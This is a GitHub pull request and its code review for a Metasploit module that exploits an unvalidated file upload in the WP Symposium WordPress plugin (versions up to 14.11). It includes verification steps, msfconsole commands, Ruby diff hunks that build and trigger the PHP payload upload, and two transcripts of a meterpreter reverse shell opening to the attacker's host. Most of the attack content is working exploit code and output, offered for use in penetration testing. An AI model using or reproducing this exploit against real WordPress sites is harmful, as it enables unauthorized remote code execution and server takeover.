### PR TITLE
Add WP Symposium Shell Upload module

### PR DESCRIPTION
**Pull request by rastating**
This module provides the ability to upload and execute an arbitrary PHP file by utilising a lack of validation in WordPress websites using versions <= 14.11 of the WP Symposium plugin.
## References
- http://www.osvdb.org/116046
- https://wpvulndb.com/vulnerabilities/7716
## Verification
- [x] Download and install [WordPress](https://wordpress.org/download/)
- [x] Download v14.11 of the WP Symposium plugin from the plugin archive at https://downloads.wordpress.org/plugin/wp-symposium.14.11.zip
- [x] Extract the `wp-symposium` folder into the `/wp-content/plugins/` directory inside your WordPress installation folder
- [x] Ensure the wp-symposium directory has write access (`chmod 777 wp-symposium -R`)
- [x] Login to your WordPress website and navigate to the plugins section (`/wp-admin/plugins.php`) and click the "Activate" link for the WP Symposium plugin to activate it 
- [x] Load msfconsole and `use exploit/unix/webapp/wp_symposium_shell_upload`
- [x] Set RHOST to the target's address
- [x] If running WordPress in a subdirectory, ensure to set TARGETURI appropriately (e.g. if running in a folder called wordpress, set TARGETURI to /wordpress/)
- [x] Set the payload
- [x] Run `check` to check if the version seems vulnerable
- [x] Run `exploit` to upload and execute the payload
## Example Output

```
msf > use exploit/unix/webapp/wp_symposium_shell_upload
msf exploit(wp_symposium_shell_upload) > set RHOST 192.168.1.15
RHOST => 192.168.1.15
msf exploit(wp_symposium_shell_upload) > set TARGETURI /wordpress/
TARGETURI => /wordpress/
msf exploit(wp_symposium_shell_upload) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(wp_symposium_shell_upload) > set LHOST 192.168.1.189
LHOST => 192.168.1.189
msf exploit(wp_symposium_shell_upload) > check
[*] 192.168.1.15:80 - The target appears to be vulnerable.
msf exploit(wp_symposium_shell_upload) > exploit

[*] Started reverse handler on 192.168.1.189:4444 
[*] 192.168.1.15:80 - Preparing payload
[*] 192.168.1.15:80 - Uploading payload to /wordpress/wp-content/plugins/wp-symposium/server/php/ARoFgSGCAx/ARoFgSGCAx.php
[+] 192.168.1.15:80 - Uploaded the payload
[*] 192.168.1.15:80 - Executing the payload...
[*] Sending stage (40551 bytes) to 192.168.1.15
[*] Meterpreter session 4 opened (192.168.1.189:4444 -> 192.168.1.15:48581) at 2015-01-08 21:09:09 +0000
[+] Deleted ARoFgSGCAx.php
[+] 192.168.1.15:80 - Executed payload

meterpreter > ls

Listing: /var/www/html/wordpress/wp-content/plugins/wp-symposium/server/php/ARoFgSGCAx
======================================================================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40755/rwxr-xr-x  4096  dir   2015-01-08 21:16:31 +0000  thumbnail

meterpreter > 
```

### CODE REVIEW

File: modules/exploits/unix/webapp/wp_symposium_shell_upload.rb [hunk 1]
```diff
@@ -0,0 +1,92 @@
...
+    data.add_part("./#{directory_name}/", nil, nil, 'form-data; name="uploader_dir"')
+    data.add_part(symposium_url, nil, nil, 'form-data; name="uploader_url"')
+    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"files[]\"; filename=\"#{payload_name}\"")
+    data
+  end
+
+  def exploit
+    print_status("#{peer} - Preparing payload")
+    unique_name = "#{Rex::Text.rand_text_alpha(10)}"
+    payload_name = "#{unique_name}.php"
```
Comment (FireFart) [inline modules/exploits/unix/webapp/wp_symposium_shell_upload.rb]: please use the FileDropper mixin to clean up the uploaded files. You can find examples of how to use it in the other wordpress modules

File: modules/exploits/unix/webapp/wp_symposium_shell_upload.rb [hunk 2]
```diff
@@ -0,0 +1,92 @@
...
+    data.add_part('1', nil, nil, 'form-data; name="uploader_uid"')
+    data.add_part("./#{directory_name}/", nil, nil, 'form-data; name="uploader_dir"')
+    data.add_part(symposium_url, nil, nil, 'form-data; name="uploader_url"')
+    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"files[]\"; filename=\"#{payload_name}\"")
+    data
+  end
+
+  def exploit
+    print_status("#{peer} - Preparing payload")
+    unique_name = "#{Rex::Text.rand_text_alpha(10)}"
```
Comment (FireFart) [inline modules/exploits/unix/webapp/wp_symposium_shell_upload.rb]: no need for interpolation here. rand_text_alpha already returns a string

File: modules/exploits/unix/webapp/wp_symposium_shell_upload.rb [hunk 3]
```diff
@@ -0,0 +1,92 @@
...
+    payload_name = "#{unique_name}.php"
+    symposium_url = normalize_uri(target_uri, wp_content_dir, 'plugins', 'wp-symposium', 'server', 'php')
```
Comment (FireFart) [inline modules/exploits/unix/webapp/wp_symposium_shell_upload.rb]: there is `wordpress_url_plugins`
https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/http/wordpress/uris.rb#L93

File: modules/exploits/unix/webapp/wp_symposium_shell_upload.rb [hunk 4]
```diff
@@ -0,0 +1,92 @@
...
+      print_status("#{peer} - Executing the payload...")
+      send_request_cgi(
+      {
+        'uri'     => payload_url,
+        'method'  => 'GET'
+      }, 5)
+      print_good("#{peer} - Executed payload")
+    else
+      print_error("#{peer} - Failed to upload the payload")
+      vprint_error("#{peer} - HTTP Status: #{res.code}")
```
Comment (FireFart) [inline modules/exploits/unix/webapp/wp_symposium_shell_upload.rb]: if res is null the else is also hit and the vprint_* will crash.

So this should be smth like
```
fail_with(....) if res.nil?
```
The fail_with codes are located here:

Comment (rastating) [inline modules/exploits/unix/webapp/wp_symposium_shell_upload.rb]: Hey @FireFart, thanks for the feedback, I will resolve these issues ASAP and let you know when I've committed the updates.

**Comment by brandonprry** [comment]
Not that it *should* matter, but a proper configuration for write access is chown -R www-data:www-data (or the relevant web server user).

This configuration should likely be tested as well, though should be functionally equivalent.

**Comment by rastating** [comment]
Hey @FireFart - I've made the changes, retested and pushed the commits

**Comment by FireFart** [comment]
thx @rastating looks good:
```
msf exploit(wp_symposium_shell_upload) > run

[*] Started reverse handler on 10.211.55.2:4444
[*] 10.211.55.39:80 - Preparing payload
[*] 10.211.55.39:80 - Uploading payload to /wp-content/plugins/wp-symposium/server/php/VrBYCosybF/VrBYCosybF.php
[+] 10.211.55.39:80 - Uploaded the payload
[*] 10.211.55.39:80 - Executing the payload...
[*] Sending stage (40499 bytes) to 10.211.55.39
[*] Meterpreter session 1 opened (10.211.55.2:4444 -> 10.211.55.39:58202) at 2015-01-09 21:35:28 +0100
[+] Deleted VrBYCosybF.php
[+] 10.211.55.39:80 - Executed payload

meterpreter > pwd
/var/www/wordpress/wp-content/plugins/wp-symposium/server/php/VrBYCosybF
meterpreter > getpid
Current pid: 1141
meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : wordpress
OS          : Linux wordpress 3.13.0-37-generic #64-Ubuntu SMP Mon Sep 22 21:28:38 UTC 2014 x86_64
Meterpreter : php/php
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.211.55.39 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(wp_symposium_shell_upload) > check
[*] 10.211.55.39:80 - The target appears to be vulnerable.
```

**Comment by rastating** [comment]
@FireFart awesome :)

**Comment by FireFart** [comment]
thx @rastating for the contribution! I also changed to wpvulndb entry and linked your new module: https://wpvulndb.com/vulnerabilities/7716 (it takes a while for the rapid7 module info to be generated)

**Comment by rastating** [comment]
Thank you, @FireFart, for taking the time to test it all and give feedback. As I mentioned in the other pull request that you were looking at these are my first Metasploit contributions, so the pointers have been very helpful. 

Hopefully I'll have more on the way soon :)

**Pull request merged**